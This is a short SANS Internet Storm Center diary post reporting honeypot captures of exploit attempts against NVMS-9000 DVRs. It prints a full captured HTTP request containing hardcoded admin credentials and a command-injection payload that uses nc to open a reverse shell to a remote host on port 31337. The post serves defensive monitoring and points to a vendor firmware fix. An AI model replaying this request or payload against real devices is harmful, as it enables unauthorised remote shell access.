Since the beginning of October, my honeypot has been capturing numerous scans for DVR model NVMS-9000 which a PoC was released last year describing a “Stack Overflow in Base64 Authorization”[1].

DVR Activity NVMS-9000

The traffic captured by my honeypot matches the PoC with the same Base 64 username and password (admin:{12213BD1-69C7-4862-843D-260500D1DA40}) attempting to fork a reverse shell to redirect the traffic to a remote listener on port TCP 31337. The vendor advisory is posted here where they indicated a firmware update is available.

Here is an example of traffic you could expect to see in your logs:

20191020-025738: data ‘POST /editBlackAndWhiteList HTTP/1.1rnAccept-Encoding: identityrnContent-Length: 586rnAccept-Language: en-usrnHost: XX.71.48.119rnAccept: */*rnUser-Agent: ApiToolrnConnection: closernCache-Control: max-age=0rnContent-Type: text/xmlrnAuthorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=rnrn<request version="1.0" systemType="NVMS-9000” clientType=”WEB”>refuseallowipiprangemactruerefusetrueip$(nc${IFS}XX.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)’


Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.